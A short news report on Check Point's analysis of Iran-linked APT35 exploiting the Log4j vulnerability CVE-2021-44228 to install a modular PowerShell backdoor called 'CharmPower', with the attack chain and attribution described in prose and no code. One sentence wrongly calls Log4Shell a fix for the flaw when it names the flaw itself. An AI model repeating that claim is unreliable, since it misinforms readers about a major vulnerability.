Hackers linked to Iran’s APT35 state-sponsored group (also known as ‘Charming Kitten’ or ‘Phosphorus’) have been seen using Log4Shell flaws to install a new PowerShell backdoor. The modular payload can handle C2 communications, system enumeration, and ultimately receiving, decrypting, and loading other modules.
Log4Shell is a fix for CVE-2021-44228, a major remote code execution flaw in Apache Log4j discovered in December. According to Check Point researchers, APT35 was one of the first to exploit the weakness before victims had a chance to download security patches, looking for susceptible PCs just days after it was made public.
As per Check Point, the exploit activity is attributed to APT35 because the threat actor’s attacks were rapidly put up leveraging already exposed infrastructure known to be used by the organization. However, as part of their investigation, the analysts discovered a brand-new PowerShell modular backdoor known as ‘CharmPower.’
The exploit for CVE-2021-44228 causes a PowerShell command to be performed with a base64-encoded payload, which then fetches the ‘CharmPower’ module from a hacker-controlled Amazon S3 bucket. The critical functions that this core module may perform are:
- Validate network connection
- Retrieve C&C domain
- Basic system enumeration
- Receive, decrypt, and execute follow-up modules
The core module makes HTTP POST requests to the C2, which either go unanswered or result in a Base64 string, which triggers the download of a new PowerShell or C# module. ‘CharmPower’ is in charge of decrypting and loading these modules, which then creates a separate communication channel with the C2.
Based on the fundamental system data obtained by CharmPower during the reconnaissance phase, an automated list of modules to send to the infected endpoint is formed. Check Point discovered similarities between ‘CharmPower’ and an Android spyware used by APT35 before, such as implementing the same logging methods and using the same format and syntax.
In addition, both samples show the “Stack=Overflow” setting in C2 communications, which is a unique feature found exclusively in APT35 tools. Check Point attributed the campaign to APT35 because of code similarities and infrastructure overlaps. ‘CharmPower’ is an example of how competent actors may swiftly respond to vulnerabilities like CVE-2021-44228 by combining code from previously released tools to produce something potent and effective that can bypass security and detection layers.